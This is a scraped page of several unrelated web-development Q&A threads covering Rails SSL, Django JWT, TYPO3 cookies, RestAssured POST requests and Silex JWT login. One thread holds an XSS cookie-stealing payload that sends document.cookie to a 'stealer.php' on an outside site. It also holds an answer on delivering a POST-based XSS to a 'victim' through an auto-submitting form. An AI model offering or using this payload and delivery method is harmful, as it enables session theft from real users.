I have an SSL enabled on site , And added force_ssl :true to my production.rb file
But when I Submit a Form the Post Params can be seen as Plain Text .
Did I miss something ?
How do I encrypt the Post Params Such that it can't be Tampered .
I did this Using Cookies by signing them.
P.S Previously I was able to get the params and edit them using Tamper Data
Related
hello I have implemented JWT in my test project using this package "djangorestframework-jwt"
I have generated the token by giving my "username" and "password"
but the problem is that I am getting this output bypassing my token with the endpoint
I am using postman to test API,Django=2.2.12, python 3.7.6
I am not getting my data from the database
{"eno":["This field is required."],"ename":["This field is required."],"esal":["This field is required."],"eaddr":["This field is required."]}
Your question is not correct, but I try to explain you what happend. So,
You try send POST request to your /api/ route and you got error because you dont send any required data. Go to Body tab and click on 'raw' radio button and than change 'Text' to JSON and insert correct JSON with data that you want to send to your server, it will be looks like:
{
"eno": "your_eno",
"ename": "your_ename"
.....
}
You should read about it if you dont know.
typo3 9.5.8
we are implementing a newsletter subscription flow with multiple steps, on submit of the second step we query graphQL in a finisher to see if the Email is valid to subscribe or not - and we set a cookie with the "state" of the email address.
setcookie("isEmailSubscribable", ($content->data->isEmailSubscribable) ? "1" : "0", time() - 3600, "/", "x.at", false);
we have to display a message on the third step based on that "state" written into a cookie. but no matter what i try the cookie does not get set (i guess).
whats the deal with cookies and typo3? is it to late to set a cookie inside a form finisher? but if yes how could i solve this?
help is much appreciated
Inside the Finisher:
// Set a cookie
$this->getTypoScriptFrontendController()->fe_user->setKey('ses', 'value', 'test');
// Get the cookie
$this->getTypoScriptFrontendController()->fe_user->getKey('ses', 'test');
ses are Session cookies
user This cookies require a fe_user to be logged in
Value can be an array, it will be stored serialized in the Database fe_sessions.ses_data
UPDATE:
Or you can try it with an PSR-15 Middleware: https://docs.typo3.org/m/typo3/reference-coreapi/master/en-us/ApiOverview/RequestHandling/Index.html
In your Middleware Class you get a $request and $response and use them to set or read a cookie:
// Write a cookie
$response = $response->withAddedHeader(
'Set-Cookie',
$cookieName . '=' . $yourValue . '; Path=/; Max-Age=' . (time()+60*60*24*30)
);
// Read a cookie
$request->getCookieParams()[$cookieName];
You just have to check request for email address and maybe an hidden field to detect that your for was submitted.
I have a problem here,, i have xss vuln website on "search bar" . on the search bar can occurs xss and i can store my own cookie to my other site using this:
hello new Image().src = "https:// site /stealer.php?cookie=" + document.cookie;
nah, how i can send the url like http:// site (.) com/search to my victim if there's no payload on url (because it uses post method) and on the page doen't show any post that can lead to XSS
or if there's another impact please explaon to me
thank you
You send them a URL to your website which in turn auto submits a form with the needed POST request to the website in question.
I am new to API testing with jayway RestAssured.
my jmeter url : http://ip:8080/servelet?token=toekntext&methodname={jsontext}
above url is POST Request, i need to fire request in jayway RestAsseured.
url = http://ip:8080/servelet
Response r = given().contentType(CONTENT_TYPE).accept(CONTENT_ACCEPT).headers("user-agent", web).queryParam("token", tokentext).queryParam("methodname", jsonttext).expect().statusCode(200).when().post(url);
Is the above code correct to fire POST Request Here i am getting 500 internal server error, plz help me.
Yes that looks right given that it truly are query parameters that JMeter is sending. I suspect that it might not be since it's very unusual in my experience that include JSON (I assume jsontext is JSON) in the request path. Try switching from queryParam to formParam to see if it makes any difference.
Try restructuring your code,
FULL-URL - url/account?token=TOKEN&sync=TRUE, then you can try post request as below
given().
contentType(ContentType.JSON).body(payload).
queryParam("token", "TOKEN").
queryParam("sync", "TRUE").
when().post(url).then().
statusCode(200).extract().response();
I am creating web service using silex micro framework. This is first time i am using it and I dont have prior knowledge on symfony. I could be able to understand how silex works and how to write controller providers , service providers etc ..
I couldnt work out authentication for my webservice.
I want to use JWT authentication and I found this cnam/security-jwt-service-provider extending firebase/php-jwt.
I set it up right and I get this output when I access protected resource
{"message":"A Token was not found in the TokenStorage."}
which is correct.
Question: I want to post the username , password to application and get token back. ( username=admin , password=foo )
I am using postman chrome extension ( also used Advanced rest client ) to post values to url ( http://silex.dev/api/login)
Post data I am sending
Key=> username Value=> admin
Key=> password Value=> foo
I also tried
Key=> _username Value=> admin
Key=> _password Value=> foo
Aldo tried key vaule pairs in basic auth headers.
response I get id
{
"success": false,
"error": "Invalid credentials"
}
When I debug the Application I see no post data at all.
$vars = json_decode($request->getContent(), true);
I get null $var.
PS: I know I will get a valid token back if I get these values posted correctly because I edited values from empty to correct values in breakpoint.
Apparently I should send data in json format and should set content-type appication/json
eg:
{
"_username":"admin",
"_password":"foo"
}
and response will something be like
{
success: true
token: "eyJ0eXAiOisKV1diLCJfbGgiOhJIjzI1NiJ9.eyJuYW1lIjoiYWRtaW4iLCJleHAiOjE0Mzk5MDUxMjh9.DMdXAv2Ay16iI1UQbHZABLCU_gsD_j9-gEU2M2L2MFQ"
}